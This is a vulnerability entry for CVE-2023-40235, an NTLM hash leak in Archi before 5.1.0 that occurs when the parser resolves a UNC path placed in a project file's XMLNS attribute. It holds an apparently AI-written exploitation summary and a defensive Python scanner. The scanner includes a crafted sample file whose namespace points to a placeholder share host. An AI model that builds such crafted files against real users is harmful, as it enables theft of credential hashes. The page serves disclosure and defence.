CVE-2023-40235
Description
An NTLM Hash Disclosure was discovered in ArchiMate Archi before 5.1.0. When parsing the XMLNS value of an ArchiMate project file, if the namespace does not match the expected ArchiMate URL, the parser will access the provided resource. If the provided resource is a UNC path pointing to a share server that does not accept a guest account, the host will try to authenticate on the share by using the current user's session. NOTE: this issue occurs because Archi uses an unsafe configuration of the Eclipse Modeling Framework.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Archi before 5.1.0 discloses NTLM hashes when opening a crafted .archimate file with a malicious UNC path in the XMLNS attribute.
Vulnerability
Archi versions before 5.1.0 contain an NTLM hash disclosure vulnerability when parsing a maliciously crafted ArchiMate project file (.archimate). The issue lies in the unsafe default configuration of the Eclipse Modeling Framework (EMF) [4], under which the XML parser treats an unregistered namespace URI from the XML namespace (XMLNS) attribute as the location of an external resource to load. If the namespace URI does not match the expected ArchiMate URL, the parser attempts to access the provided resource, even if it is a UNC path [1][2]. The affected versions include all releases prior to 5.1.0 [1].
Exploitation
An attacker must craft a .archimate file with an XMLNS attribute pointing to a UNC path (e.g., \\attacker\share) that does not allow guest access. The victim must open this file in Archi. No authentication or special privileges are required; the attacker only needs the victim to open the file. When the file is parsed, the victim's system attempts to authenticate to the attacker's share using the current user's NTLM credentials, thereby disclosing the NTLM hash over the network [2].
Impact
Successful exploitation allows the attacker to capture the NTLM hash of the authenticated user. With the hash, offline password cracking can be performed to recover the plaintext password, potentially leading to unauthorized access to the victim's system or network resources [2]. This is a credential disclosure vulnerability that compromises user authentication secrecy.
Mitigation
The vulnerability is fixed in Archi version 5.1.0 [1]. The fix, implemented in commit bcab676 [3], disables the EMF option OPTION_USE_PACKAGE_NS_URI_AS_LOCATION to prevent the parser from loading unregistered namespace URIs. Users should upgrade to version 5.1.0 or later. No workaround is available for earlier versions.
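As an added example (not Archi's or EMF's own code), a pre-open check a defender can run over .archimate files before handing them to an unpatched Archi: it flags every xmlns declaration that is not one of the namespaces a legitimate model declares, and goes a little beyond the case in the text by recognising UNC values in backslash, forward-slash and file: URI forms as well as plain remote URLs. The allowlist of expected namespace URIs, the sample documents and the placeholder share name are assumptions constructed for the example.

```python
import re
from typing import List, Tuple

# Assumption: the namespaces a legitimate Archi model file declares. Anything else
# would, on an unpatched Archi, be treated by EMF as a location to resolve.
EXPECTED_NAMESPACES = {
    "http://www.archimatetool.com/archimate",       # ArchiMate model package
    "http://www.w3.org/2001/XMLSchema-instance",    # xsi, standard XML namespace
}

# Matches xmlns="..." and xmlns:prefix='...' declarations in the raw document text
# (an XML parser would consume them, so the raw text is inspected instead).
XMLNS_RE = re.compile(r"""\bxmlns(?::[\w.-]+)?\s*=\s*(["'])(.*?)\1""")

def classify_namespace(uri: str) -> str:
    """Return 'ok', 'unc', 'remote' or 'unexpected' for one namespace value."""
    if uri in EXPECTED_NAMESPACES:
        return "ok"
    # UNC path in backslash or forward-slash form, bare or wrapped in a file: URI
    if uri.startswith(("\\\\", "//")) or re.match(r"(?i)^file:(//)?[\\/]{2}", uri):
        return "unc"
    if re.match(r"(?i)^(https?|ftp|smb)://", uri):
        return "remote"
    return "unexpected"

def scan_archimate(xml_text: str) -> List[Tuple[str, str]]:
    """List (namespace, verdict) for every declaration that is not an expected one."""
    findings = []
    for match in XMLNS_RE.finditer(xml_text):
        uri = match.group(2)
        verdict = classify_namespace(uri)
        if verdict != "ok":
            findings.append((uri, verdict))
    return findings

# Constructed samples: a benign model header and one whose namespace is a UNC path
# (placeholder host and share name, not a real server).
BENIGN_MODEL = """<?xml version="1.0" encoding="UTF-8"?>
<archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:archimate="http://www.archimatetool.com/archimate" name="demo" id="id-1"/>"""

CRAFTED_MODEL = """<?xml version="1.0" encoding="UTF-8"?>
<archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:archimate="\\\\SHARE-HOST-PLACEHOLDER\\share" name="demo" id="id-1"/>"""

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_MODEL), ("crafted", CRAFTED_MODEL)):
        print(name, scan_archimate(doc) or "no unexpected namespaces")
```

A non-empty result means the file should be quarantined rather than opened in a pre-5.1.0 Archi; on 5.1.0 and later the disabled EMF option makes the namespace value inert, but the check still catches tampered models.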
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
ArchiMate/Archi